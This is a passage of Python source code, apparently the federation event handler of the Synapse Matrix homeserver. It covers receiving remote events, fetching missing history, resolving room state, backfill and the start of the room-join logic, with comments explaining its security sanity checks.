# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains handlers for federation events."""
import itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import event_auth
from synapse.api.constants import (
EventTypes,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import compute_event_signature
from synapse.event_auth import auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
@attr.s(slots=True)
class _NewEventInfo:
"""Holds information about a received event, ready for passing to _handle_new_events
Attributes:
event: the received event
state: the state at that event
auth_events: the auth_event map for that event
"""
event = attr.ib(type=EventBase)
state = attr.ib(type=Optional[Sequence[EventBase]], default=None)
auth_events = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class FederationHandler(BaseHandler):
"""Handles events that originated from federation.
Responsible for:
a) handling received Pdus before handing them on as Events to the rest
of the homeserver (including auth and state conflict resolutions)
b) converting events that were produced by local clients that may need
to be sent to remote homeservers.
c) doing the necessary dances to invite remote users and join remote
rooms.
"""
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.hs = hs
self.store = hs.get_datastore()
self.storage = hs.get_storage()
self.state_store = self.storage.state
self.federation_client = hs.get_federation_client()
self.state_handler = hs.get_state_handler()
self._state_resolution_handler = hs.get_state_resolution_handler()
self.server_name = hs.hostname
self.keyring = hs.get_keyring()
self.action_generator = hs.get_action_generator()
self.is_mine_id = hs.is_mine_id
self.spam_checker = hs.get_spam_checker()
self.event_creation_handler = hs.get_event_creation_handler()
self._message_handler = hs.get_message_handler()
self._server_notices_mxid = hs.config.server_notices_mxid
self.config = hs.config
self.http_client = hs.get_simple_http_client()
self._instance_name = hs.get_instance_name()
self._replication = hs.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(hs)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
hs
)
if hs.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
hs
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
hs
)
else:
self._device_list_updater = hs.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
# When joining a room we need to queue any events for that room up.
# For each room, a list of (pdu, origin) tuples.
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = hs.get_third_party_event_rules()
self._ephemeral_messages_enabled = hs.config.enable_ephemeral_messages
async def on_receive_pdu(self, origin, pdu, sent_to_us_directly=False) -> None:
""" Process a PDU received via a federation /send/ transaction, or
via backfill of missing prev_events
Args:
origin (str): server which initiated the /send/ transaction. Will
be used to fetch missing events or state.
pdu (FrozenEvent): received PDU
sent_to_us_directly (bool): True if this event was pushed to us; False if
we pulled it as the result of a missing prev_event.
"""
room_id = pdu.room_id
event_id = pdu.event_id
logger.info("handling received PDU: %s", pdu)
# We reprocess pdus when we have seen them only as outliers
existing = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
# FIXME: Currently we fetch an event again when we already have it
# if it has been marked as an outlier.
already_seen = existing and (
not existing.internal_metadata.is_outlier()
or pdu.internal_metadata.is_outlier()
)
if already_seen:
logger.debug("[%s %s]: Already seen pdu", room_id, event_id)
return
# do some initial sanity-checking of the event. In particular, make
# sure it doesn't have hundreds of prev_events or auth_events, which
# could cause a huge state resolution or cascade of event fetches.
try:
self._sanity_check_event(pdu)
except SynapseError as err:
logger.warning(
"[%s %s] Received event failed sanity checks", room_id, event_id
)
raise FederationError("ERROR", err.code, err.msg, affected=pdu.event_id)
# If we are currently in the process of joining this room, then we
# queue up events for later processing.
if room_id in self.room_queues:
logger.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
room_id,
event_id,
origin,
)
self.room_queues[room_id].append((pdu, origin))
return
# If we're not in the room just ditch the event entirely. This is
# probably an old server that has come back and thinks we're still in
# the room (or we've been rejoined to the room by a state reset).
#
# Note that if we were never in the room then we would have already
# dropped the event, since we wouldn't know the room version.
is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
if not is_in_room:
logger.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
room_id,
event_id,
origin,
)
return None
state = None
# Get missing pdus if necessary.
if not pdu.internal_metadata.is_outlier():
# We only backfill backwards to the min depth.
min_depth = await self.get_min_depth_for_context(pdu.room_id)
logger.debug("[%s %s] min_depth: %d", room_id, event_id, min_depth)
prevs = set(pdu.prev_event_ids())
seen = await self.store.have_events_in_timeline(prevs)
if min_depth is not None and pdu.depth < min_depth:
# This is so that we don't notify the user about this
# message, to work around the fact that some events will
# reference really really old events we really don't want to
# send to the clients.
pdu.internal_metadata.outlier = True
elif min_depth is not None and pdu.depth > min_depth:
missing_prevs = prevs - seen
if sent_to_us_directly and missing_prevs:
# If we're missing stuff, ensure we only fetch stuff one
# at a time.
logger.info(
"[%s %s] Acquiring room lock to fetch %d missing prev_events: %s",
room_id,
event_id,
len(missing_prevs),
shortstr(missing_prevs),
)
with (await self._room_pdu_linearizer.queue(pdu.room_id)):
logger.info(
"[%s %s] Acquired room lock to fetch %d missing prev_events",
room_id,
event_id,
len(missing_prevs),
)
try:
await self._get_missing_events_for_pdu(
origin, pdu, prevs, min_depth
)
except Exception as e:
raise Exception(
"Error fetching missing prev_events for %s: %s"
% (event_id, e)
) from e
# Update the set of things we've seen after trying to
# fetch the missing stuff
seen = await self.store.have_events_in_timeline(prevs)
if not prevs - seen:
logger.info(
"[%s %s] Found all missing prev_events",
room_id,
event_id,
)
if prevs - seen:
# We've still not been able to get all of the prev_events for this event.
#
# In this case, we need to fall back to asking another server in the
# federation for the state at this event. That's ok provided we then
# resolve the state against other bits of the DAG before using it (which
# will ensure that you can't just take over a room by sending an event,
# withholding its prev_events, and declaring yourself to be an admin in
# the subsequent state request).
#
# Now, if we're pulling this event as a missing prev_event, then clearly
# this event is not going to become the only forward-extremity and we are
# guaranteed to resolve its state against our existing forward
# extremities, so that should be fine.
#
# On the other hand, if this event was pushed to us, it is possible for
# it to become the only forward-extremity in the room, and we would then
# trust its state to be the state for the whole room. This is very bad.
# Further, if the event was pushed to us, there is no excuse for us not to
# have all the prev_events. We therefore reject any such events.
#
# XXX this really feels like it could/should be merged with the above,
# but there is an interaction with min_depth that I'm not really
# following.
if sent_to_us_directly:
logger.warning(
"[%s %s] Rejecting: failed to fetch %d prev events: %s",
room_id,
event_id,
len(prevs - seen),
shortstr(prevs - seen),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this event."
),
affected=pdu.event_id,
)
logger.info(
"Event %s is missing prev_events: calculating state for a "
"backwards extremity",
event_id,
)
# Calculate the state after each of the previous events, and
# resolve them to find the correct state at the current event.
event_map = {event_id: pdu}
try:
# Get the state of the events we know about
ours = await self.state_store.get_state_groups_ids(room_id, seen)
# state_maps is a list of mappings from (type, state_key) to event_id
state_maps = list(ours.values()) # type: List[StateMap[str]]
# we don't need this any more, let's delete it.
del ours
# Ask the remote server for the states we don't
# know about
for p in prevs - seen:
logger.info(
"Requesting state at missing prev_event %s", event_id,
)
with nested_logging_context(p):
# note that if any of the missing prevs share missing state or
# auth events, the requests to fetch those events are deduped
# by the get_pdu_cache in federation_client.
(remote_state, _,) = await self._get_state_for_room(
origin, room_id, p, include_event_in_state=True
)
remote_state_map = {
(x.type, x.state_key): x.event_id for x in remote_state
}
state_maps.append(remote_state_map)
for x in remote_state:
event_map[x.event_id] = x
room_version = await self.store.get_room_version_id(room_id)
state_map = await self._state_resolution_handler.resolve_events_with_store(
room_id,
room_version,
state_maps,
event_map,
state_res_store=StateResolutionStore(self.store),
)
# We need to give _process_received_pdu the actual state events
# rather than event ids, so generate that now.
# First though we need to fetch all the events that are in
# state_map, so we can build up the state below.
evs = await self.store.get_events(
list(state_map.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
event_map.update(evs)
state = [event_map[e] for e in state_map.values()]
except Exception:
logger.warning(
"[%s %s] Error attempting to resolve state at missing "
"prev_events",
room_id,
event_id,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid state history.",
affected=event_id,
)
await self._process_received_pdu(origin, pdu, state=state)
async def _get_missing_events_for_pdu(self, origin, pdu, prevs, min_depth):
"""
Args:
origin (str): Origin of the pdu. Will be called to get the missing events
pdu: received pdu
prevs (set(str)): List of event ids which we are missing
min_depth (int): Minimum depth of events to return.
"""
room_id = pdu.room_id
event_id = pdu.event_id
seen = await self.store.have_events_in_timeline(prevs)
if not prevs - seen:
return
latest_list = await self.store.get_latest_event_ids_in_room(room_id)
# We add the prev events that we have seen to the latest
# list to ensure the remote server doesn't give them to us
latest = set(latest_list)
latest |= seen
logger.info(
"[%s %s]: Requesting missing events between %s and %s",
room_id,
event_id,
shortstr(latest),
event_id,
)
# XXX: we set timeout to 10s to help workaround
# https://github.com/matrix-org/synapse/issues/1733.
# The reason is to avoid holding the linearizer lock
# whilst processing inbound /send transactions, causing
# FDs to stack up and block other inbound transactions
# which empirically can currently take up to 30 minutes.
#
# N.B. this explicitly disables retry attempts.
#
# N.B. this also increases our chances of falling back to
# fetching fresh state for the room if the missing event
# can't be found, which slightly reduces our security.
# it may also increase our DAG extremity count for the room,
# causing additional state resolution? See #1760.
# However, fetching state doesn't hold the linearizer lock
# apparently.
#
# see https://github.com/matrix-org/synapse/pull/1744
#
# ----
#
# Update richvdh 2018/09/18: There are a number of problems with timing this
# request out aggressively on the client side:
#
# - it plays badly with the server-side rate-limiter, which starts tarpitting you
# if you send too many requests at once, so you end up with the server carefully
# working through the backlog of your requests, which you have already timed
# out.
#
# - for this request in particular, we now (as of
# https://github.com/matrix-org/synapse/pull/3456) reject any PDUs where the
# server can't produce a plausible-looking set of prev_events - so we becone
# much more likely to reject the event.
#
# - contrary to what it says above, we do *not* fall back to fetching fresh state
# for the room if get_missing_events times out. Rather, we give up processing
# the PDU whose prevs we are missing, which then makes it much more likely that
# we'll end up back here for the *next* PDU in the list, which exacerbates the
# problem.
#
# - the aggressive 10s timeout was introduced to deal with incoming federation
# requests taking 8 hours to process. It's not entirely clear why that was going
# on; certainly there were other issues causing traffic storms which are now
# resolved, and I think in any case we may be more sensible about our locking
# now. We're *certainly* more sensible about our logging.
#
# All that said: Let's try increasing the timeout to 60s and see what happens.
try:
missing_events = await self.federation_client.get_missing_events(
origin,
room_id,
earliest_events_ids=list(latest),
latest_events=[pdu],
limit=10,
min_depth=min_depth,
timeout=60000,
)
except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as e:
# We failed to get the missing events, but since we need to handle
# the case of `get_missing_events` not returning the necessary
# events anyway, it is safe to simply log the error and continue.
logger.warning(
"[%s %s]: Failed to get prev_events: %s", room_id, event_id, e
)
return
logger.info(
"[%s %s]: Got %d prev_events: %s",
room_id,
event_id,
len(missing_events),
shortstr(missing_events),
)
# We want to sort these by depth so we process them and
# tell clients about them in order.
missing_events.sort(key=lambda x: x.depth)
for ev in missing_events:
logger.info(
"[%s %s] Handling received prev_event %s",
room_id,
event_id,
ev.event_id,
)
with nested_logging_context(ev.event_id):
try:
await self.on_receive_pdu(origin, ev, sent_to_us_directly=False)
except FederationError as e:
if e.code == 403:
logger.warning(
"[%s %s] Received prev_event %s failed history check.",
room_id,
event_id,
ev.event_id,
)
else:
raise
async def _get_state_for_room(
self,
destination: str,
room_id: str,
event_id: str,
include_event_in_state: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
"""Requests all of the room state at a given event from a remote homeserver.
Args:
destination: The remote homeserver to query for the state.
room_id: The id of the room we're interested in.
event_id: The id of the event we want the state at.
include_event_in_state: if true, the event itself will be included in the
returned state event list.
Returns:
A list of events in the state, possibly including the event itself, and
a list of events in the auth chain for the given event.
"""
(
state_event_ids,
auth_event_ids,
) = await self.federation_client.get_room_state_ids(
destination, room_id, event_id=event_id
)
desired_events = set(state_event_ids + auth_event_ids)
if include_event_in_state:
desired_events.add(event_id)
event_map = await self._get_events_from_store_or_dest(
destination, room_id, desired_events
)
failed_to_fetch = desired_events - event_map.keys()
if failed_to_fetch:
logger.warning(
"Failed to fetch missing state/auth events for %s %s",
event_id,
failed_to_fetch,
)
remote_state = [
event_map[e_id] for e_id in state_event_ids if e_id in event_map
]
if include_event_in_state:
remote_event = event_map.get(event_id)
if not remote_event:
raise Exception("Unable to get missing prev_event %s" % (event_id,))
if remote_event.is_state() and remote_event.rejected_reason is None:
remote_state.append(remote_event)
auth_chain = [event_map[e_id] for e_id in auth_event_ids if e_id in event_map]
auth_chain.sort(key=lambda e: e.depth)
return remote_state, auth_chain
async def _get_events_from_store_or_dest(
self, destination: str, room_id: str, event_ids: Iterable[str]
) -> Dict[str, EventBase]:
"""Fetch events from a remote destination, checking if we already have them.
Persists any events we don't already have as outliers.
If we fail to fetch any of the events, a warning will be logged, and the event
will be omitted from the result. Likewise, any events which turn out not to
be in the given room.
This function *does not* automatically get missing auth events of the
newly fetched events. Callers must include the full auth chain of
of the missing events in the `event_ids` argument, to ensure that any
missing auth events are correctly fetched.
Returns:
map from event_id to event
"""
fetched_events = await self.store.get_events(event_ids, allow_rejected=True)
missing_events = set(event_ids) - fetched_events.keys()
if missing_events:
logger.debug(
"Fetching unknown state/auth events %s for room %s",
missing_events,
room_id,
)
await self._get_events_and_persist(
destination=destination, room_id=room_id, events=missing_events
)
# we need to make sure we re-load from the database to get the rejected
# state correct.
fetched_events.update(
(await self.store.get_events(missing_events, allow_rejected=True))
)
# check for events which were in the wrong room.
#
# this can happen if a remote server claims that the state or
# auth_events at an event in room A are actually events in room B
bad_events = [
(event_id, event.room_id)
for event_id, event in fetched_events.items()
if event.room_id != room_id
]
for bad_event_id, bad_room_id in bad_events:
# This is a bogus situation, but since we may only discover it a long time
# after it happened, we try our best to carry on, by just omitting the
# bad events from the returned auth/state set.
logger.warning(
"Remote server %s claims event %s in room %s is an auth/state "
"event in room %s",
destination,
bad_event_id,
bad_room_id,
room_id,
)
del fetched_events[bad_event_id]
return fetched_events
async def _process_received_pdu(
self, origin: str, event: EventBase, state: Optional[Iterable[EventBase]],
):
""" Called when we have a new pdu. We need to do auth checks and put it
through the StateHandler.
Args:
origin: server sending the event
event: event to be persisted
state: Normally None, but if we are handling a gap in the graph
(ie, we are missing one or more prev_events), the resolved state at the
event
"""
room_id = event.room_id
event_id = event.event_id
logger.debug("[%s %s] Processing event: %s", room_id, event_id, event)
try:
await self._handle_new_event(origin, event, state=state)
except AuthError as e:
raise FederationError("ERROR", e.code, e.msg, affected=event.event_id)
# For encrypted messages we check that we know about the sending device,
# if we don't then we mark the device cache for that user as stale.
if event.type == EventTypes.Encrypted:
device_id = event.content.get("device_id")
sender_key = event.content.get("sender_key")
cached_devices = await self.store.get_cached_devices_for_user(event.sender)
resync = False # Whether we should resync device lists.
device = None
if device_id is not None:
device = cached_devices.get(device_id)
if device is None:
logger.info(
"Received event from remote device not in our cache: %s %s",
event.sender,
device_id,
)
resync = True
# We also check if the `sender_key` matches what we expect.
if sender_key is not None:
# Figure out what sender key we're expecting. If we know the
# device and recognize the algorithm then we can work out the
# exact key to expect. Otherwise check it matches any key we
# have for that device.
current_keys = [] # type: Container[str]
if device:
keys = device.get("keys", {}).get("keys", {})
if (
event.content.get("algorithm")
== RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
):
# For this algorithm we expect a curve25519 key.
key_name = "curve25519:%s" % (device_id,)
current_keys = [keys.get(key_name)]
else:
# We don't know understand the algorithm, so we just
# check it matches a key for the device.
current_keys = keys.values()
elif device_id:
# We don't have any keys for the device ID.
pass
else:
# The event didn't include a device ID, so we just look for
# keys across all devices.
current_keys = [
key
for device in cached_devices.values()
for key in device.get("keys", {}).get("keys", {}).values()
]
# We now check that the sender key matches (one of) the expected
# keys.
if sender_key not in current_keys:
logger.info(
"Received event from remote device with unexpected sender key: %s %s: %s",
event.sender,
device_id or "<no device_id>",
sender_key,
)
resync = True
if resync:
run_as_background_process(
"resync_device_due_to_pdu", self._resync_device, event.sender
)
async def _resync_device(self, sender: str) -> None:
"""We have detected that the device list for the given user may be out
of sync, so we try and resync them.
"""
try:
await self.store.mark_remote_user_device_cache_as_stale(sender)
# Immediately attempt a resync in the background
if self.config.worker_app:
await self._user_device_resync(user_id=sender)
else:
await self._device_list_updater.user_device_resync(sender)
except Exception:
logger.exception("Failed to resync device for %s", sender)
@log_function
async def backfill(self, dest, room_id, limit, extremities):
""" Trigger a backfill request to `dest` for the given `room_id`
This will attempt to get more events from the remote. If the other side
has no new events to offer, this will return an empty list.
As the events are received, we check their signatures, and also do some
sanity-checking on them. If any of the backfilled events are invalid,
this method throws a SynapseError.
TODO: make this more useful to distinguish failures of the remote
server from invalid events (there is probably no point in trying to
re-fetch invalid events from every other HS in the room.)
"""
if dest == self.server_name:
raise SynapseError(400, "Can't backfill from self.")
events = await self.federation_client.backfill(
dest, room_id, limit=limit, extremities=extremities
)
if not events:
return []
# ideally we'd sanity check the events here for excess prev_events etc,
# but it's hard to reject events at this point without completely
# breaking backfill in the same way that it is currently broken by
# events whose signature we cannot verify (#3121).
#
# So for now we accept the events anyway. #3124 tracks this.
#
# for ev in events:
# self._sanity_check_event(ev)
# Don't bother processing events we already have.
seen_events = await self.store.have_events_in_timeline(
{e.event_id for e in events}
)
events = [e for e in events if e.event_id not in seen_events]
if not events:
return []
event_map = {e.event_id: e for e in events}
event_ids = {e.event_id for e in events}
# build a list of events whose prev_events weren't in the batch.
# (XXX: this will include events whose prev_events we already have; that doesn't
# sound right?)
edges = [ev.event_id for ev in events if set(ev.prev_event_ids()) - event_ids]
logger.info("backfill: Got %d events with %d edges", len(events), len(edges))
# For each edge get the current state.
auth_events = {}
state_events = {}
events_to_state = {}
for e_id in edges:
state, auth = await self._get_state_for_room(
destination=dest,
room_id=room_id,
event_id=e_id,
include_event_in_state=False,
)
auth_events.update({a.event_id: a for a in auth})
auth_events.update({s.event_id: s for s in state})
state_events.update({s.event_id: s for s in state})
events_to_state[e_id] = state
required_auth = {
a_id
for event in events
+ list(state_events.values())
+ list(auth_events.values())
for a_id in event.auth_event_ids()
}
auth_events.update(
{e_id: event_map[e_id] for e_id in required_auth if e_id in event_map}
)
ev_infos = []
# Step 1: persist the events in the chunk we fetched state for (i.e.
# the backwards extremities), with custom auth events and state
for e_id in events_to_state:
# For paranoia we ensure that these events are marked as
# non-outliers
ev = event_map[e_id]
assert not ev.internal_metadata.is_outlier()
ev_infos.append(
_NewEventInfo(
event=ev,
state=events_to_state[e_id],
auth_events={
(
auth_events[a_id].type,
auth_events[a_id].state_key,
): auth_events[a_id]
for a_id in ev.auth_event_ids()
if a_id in auth_events
},
)
)
if ev_infos:
await self._handle_new_events(dest, room_id, ev_infos, backfilled=True)
# Step 2: Persist the rest of the events in the chunk one by one
events.sort(key=lambda e: e.depth)
for event in events:
if event in events_to_state:
continue
# For paranoia we ensure that these events are marked as
# non-outliers
assert not event.internal_metadata.is_outlier()
# We store these one at a time since each event depends on the
# previous to work out the state.
# TODO: We can probably do something more clever here.
await self._handle_new_event(dest, event, backfilled=True)
return events
async def maybe_backfill(
self, room_id: str, current_depth: int, limit: int
) -> bool:
"""Checks the database to see if we should backfill before paginating,
and if so do.
Args:
room_id
current_depth: The depth from which we're paginating from. This is
used to decide if we should backfill and what extremities to
use.
limit: The number of events that the pagination request will
return. This is used as part of the heuristic to decide if we
should back paginate.
"""
extremities = await self.store.get_oldest_events_with_depth_in_room(room_id)
if not extremities:
logger.debug("Not backfilling as no extremeties found.")
return False
# We only want to paginate if we can actually see the events we'll get,
# as otherwise we'll just spend a lot of resources to get redacted
# events.
#
# We do this by filtering all the backwards extremities and seeing if
# any remain. Given we don't have the extremity events themselves, we
# need to actually check the events that reference them.
#
# *Note*: the spec wants us to keep backfilling until we reach the start
# of the room in case we are allowed to see some of the history. However
# in practice that causes more issues than its worth, as a) its
# relatively rare for there to be any visible history and b) even when
# there is its often sufficiently long ago that clients would stop
# attempting to paginate before backfill reached the visible history.
#
# TODO: If we do do a backfill then we should filter the backwards
# extremities to only include those that point to visible portions of
# history.
#
# TODO: Correctly handle the case where we are allowed to see the
# forward event but not the backward extremity, e.g. in the case of
# initial join of the server where we are allowed to see the join
# event but not anything before it. This would require looking at the
# state *before* the event, ignoring the special casing certain event
# types have.
forward_events = await self.store.get_successor_events(list(extremities))
extremities_events = await self.store.get_events(
forward_events,
redact_behaviour=EventRedactBehaviour.AS_IS,
get_prev_content=False,
)
# We set `check_history_visibility_only` as we might otherwise get false
# positives from users having been erased.
filtered_extremities = await filter_events_for_server(
self.storage,
self.server_name,
list(extremities_events.values()),
redact=False,
check_history_visibility_only=True,
)
if not filtered_extremities:
return False
# Check if we reached a point where we should start backfilling.
sorted_extremeties_tuple = sorted(extremities.items(), key=lambda e: -int(e[1]))
max_depth = sorted_extremeties_tuple[0][1]
# If we're approaching an extremity we trigger a backfill, otherwise we
# no-op.
#
# We chose twice the limit here as then clients paginating backwards
# will send pagination requests that trigger backfill at least twice
# using the most recent extremity before it gets removed (see below). We
# chose more than one times the limit in case of failure, but choosing a
# much larger factor will result in triggering a backfill request much
# earlier than necessary.
if current_depth - 2 * limit > max_depth:
logger.debug(
"Not backfilling as we don't need to. %d < %d - 2 * %d",
max_depth,
current_depth,
limit,
)
return False
logger.debug(
"room_id: %s, backfill: current_depth: %s, max_depth: %s, extrems: %s",
room_id,
current_depth,
max_depth,
sorted_extremeties_tuple,
)
# We ignore extremities that have a greater depth than our current depth
# as:
# 1. we don't really care about getting events that have happened
# before our current position; and
# 2. we have likely previously tried and failed to backfill from that
# extremity, so to avoid getting "stuck" requesting the same
# backfill repeatedly we drop those extremities.
filtered_sorted_extremeties_tuple = [
t for t in sorted_extremeties_tuple if int(t[1]) <= current_depth
]
# However, we need to check that the filtered extremities are non-empty.
# If they are empty then either we can a) bail or b) still attempt to
# backill. We opt to try backfilling anyway just in case we do get
# relevant events.
if filtered_sorted_extremeties_tuple:
sorted_extremeties_tuple = filtered_sorted_extremeties_tuple
# We don't want to specify too many extremities as it causes the backfill
# request URI to be too long.
extremities = dict(sorted_extremeties_tuple[:5])
# Now we need to decide which hosts to hit first.
# First we try hosts that are already in the room
# TODO: HEURISTIC ALERT.
curr_state = await self.state_handler.get_current_state(room_id)
def get_domains_from_state(state):
"""Get joined domains from state
Args:
state (dict[tuple, FrozenEvent]): State map from type/state
key to event.
Returns:
list[tuple[str, int]]: Returns a list of servers with the
lowest depth of their joins. Sorted by lowest depth first.
"""
joined_users = [
(state_key, int(event.depth))
for (e_type, state_key), event in state.items()
if e_type == EventTypes.Member and event.membership == Membership.JOIN
]
joined_domains = {} # type: Dict[str, int]
for u, d in joined_users:
try:
dom = get_domain_from_id(u)
old_d = joined_domains.get(dom)
if old_d:
joined_domains[dom] = min(d, old_d)
else:
joined_domains[dom] = d
except Exception:
pass
return sorted(joined_domains.items(), key=lambda d: d[1])
curr_domains = get_domains_from_state(curr_state)
likely_domains = [
domain for domain, depth in curr_domains if domain != self.server_name
]
async def try_backfill(domains):
# TODO: Should we try multiple of these at a time?
for dom in domains:
try:
await self.backfill(
dom, room_id, limit=100, extremities=extremities
)
# If this succeeded then we probably already have the
# appropriate stuff.
# TODO: We can probably do something more intelligent here.
return True
except SynapseError as e:
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except HttpResponseException as e:
if 400 <= e.code < 500:
raise e.to_synapse_error()
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except CodeMessageException as e:
if 400 <= e.code < 500:
raise
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except NotRetryingDestination as e:
logger.info(str(e))
continue
except RequestSendFailed as e:
logger.info("Failed to get backfill from %s because %s", dom, e)
continue
except FederationDeniedError as e:
logger.info(e)
continue
except Exception as e:
logger.exception("Failed to backfill from %s because %s", dom, e)
continue
return False
success = await try_backfill(likely_domains)
if success:
return True
# Huh, well *those* domains didn't work out. Lets try some domains
# from the time.
tried_domains = set(likely_domains)
tried_domains.add(self.server_name)
event_ids = list(extremities.keys())
logger.debug("calling resolve_state_groups in _maybe_backfill")
resolve = preserve_fn(self.state_handler.resolve_state_groups_for_events)
states = await make_deferred_yieldable(
defer.gatherResults(
[resolve(room_id, [e]) for e in event_ids], consumeErrors=True
)
)
# dict[str, dict[tuple, str]], a map from event_id to state map of
# event_ids.
states = dict(zip(event_ids, [s.state for s in states]))
state_map = await self.store.get_events(
[e_id for ids in states.values() for e_id in ids.values()],
get_prev_content=False,
)
states = {
key: {
k: state_map[e_id]
for k, e_id in state_dict.items()
if e_id in state_map
}
for key, state_dict in states.items()
}
for e_id, _ in sorted_extremeties_tuple:
likely_domains = get_domains_from_state(states[e_id])
success = await try_backfill(
[dom for dom, _ in likely_domains if dom not in tried_domains]
)
if success:
return True
tried_domains.update(dom for dom, _ in likely_domains)
return False
async def _get_events_and_persist(
self, destination: str, room_id: str, events: Iterable[str]
):
"""Fetch the given events from a server, and persist them as outliers.
This function *does not* recursively get missing auth events of the
newly fetched events. Callers must include in the `events` argument
any missing events from the auth chain.
Logs a warning if we can't find the given event.
"""
room_version = await self.store.get_room_version(room_id)
event_map = {} # type: Dict[str, EventBase]
async def get_event(event_id: str):
with nested_logging_context(event_id):
try:
event = await self.federation_client.get_pdu(
[destination], event_id, room_version, outlier=True,
)
if event is None:
logger.warning(
"Server %s didn't return event %s", destination, event_id,
)
return
event_map[event.event_id] = event
except Exception as e:
logger.warning(
"Error fetching missing state/auth event %s: %s %s",
event_id,
type(e),
e,
)
await concurrently_execute(get_event, events, 5)
# Make a map of auth events for each event. We do this after fetching
# all the events as some of the events' auth events will be in the list
# of requested events.
auth_events = [
aid
for event in event_map.values()
for aid in event.auth_event_ids()
if aid not in event_map
]
persisted_events = await self.store.get_events(
auth_events, allow_rejected=True,
)
event_infos = []
for event in event_map.values():
auth = {}
for auth_event_id in event.auth_event_ids():
ae = persisted_events.get(auth_event_id) or event_map.get(auth_event_id)
if ae:
auth[(ae.type, ae.state_key)] = ae
else:
logger.info("Missing auth event %s", auth_event_id)
event_infos.append(_NewEventInfo(event, None, auth))
await self._handle_new_events(
destination, room_id, event_infos,
)
def _sanity_check_event(self, ev):
"""
Do some early sanity checks of a received event
In particular, checks it doesn't have an excessive number of
prev_events or auth_events, which could cause a huge state resolution
or cascade of event fetches.
Args:
ev (synapse.events.EventBase): event to be checked
Returns: None
Raises:
SynapseError if the event does not pass muster
"""
if len(ev.prev_event_ids()) > 20:
logger.warning(
"Rejecting event %s which has %i prev_events",
ev.event_id,
len(ev.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(ev.auth_event_ids()) > 10:
logger.warning(
"Rejecting event %s which has %i auth_events",
ev.event_id,
len(ev.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def send_invite(self, target_host, event):
""" Sends the invite to the remote server for signing.
Invites must be signed by the invitee's server before distribution.
"""
pdu = await self.federation_client.send_invite(
destination=target_host,
room_id=event.room_id,
event_id=event.event_id,
pdu=event,
)
return pdu
async def on_event_auth(self, event_id: str) -> List[EventBase]:
event = await self.store.get_event(event_id)
auth = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
return list(auth)
async def do_invite_join(
self, target_hosts: Iterable[str], room_id: str, joinee: str, content: JsonDict
) -> Tuple[str, int]:
""" Attempts to join the `joinee` to the room `room_id` via the
servers contained in `target_hosts`.
This first triggers a /make_join/ request that returns a partial
event that we can fill out and sign. This is then sent to the
remote server via /send_join/ which responds with the state at that
event and the auth_chains.
We suspend processing of any received events from this room until we
have finished processing the join.
Args:
target_hosts: List of servers to attempt to join the room with.
room_id: The ID of the room to join.
joinee: The User ID of the joining user.
content: The event content to use for the join event.
"""
# TODO: We should be able to call this on workers, but the upgrading of
# room stuff after join currently doesn't work on workers.
assert self.config.worker.worker_app is None
logger.debug("Joining %s to %s", joinee, room_id)
origin, event, room_version_obj = await self._make_and_verify_event(
target_hosts,
room_id,
joinee,
"join",
content,
params={"ver": KNOWN_ROOM_VERSIONS},
)
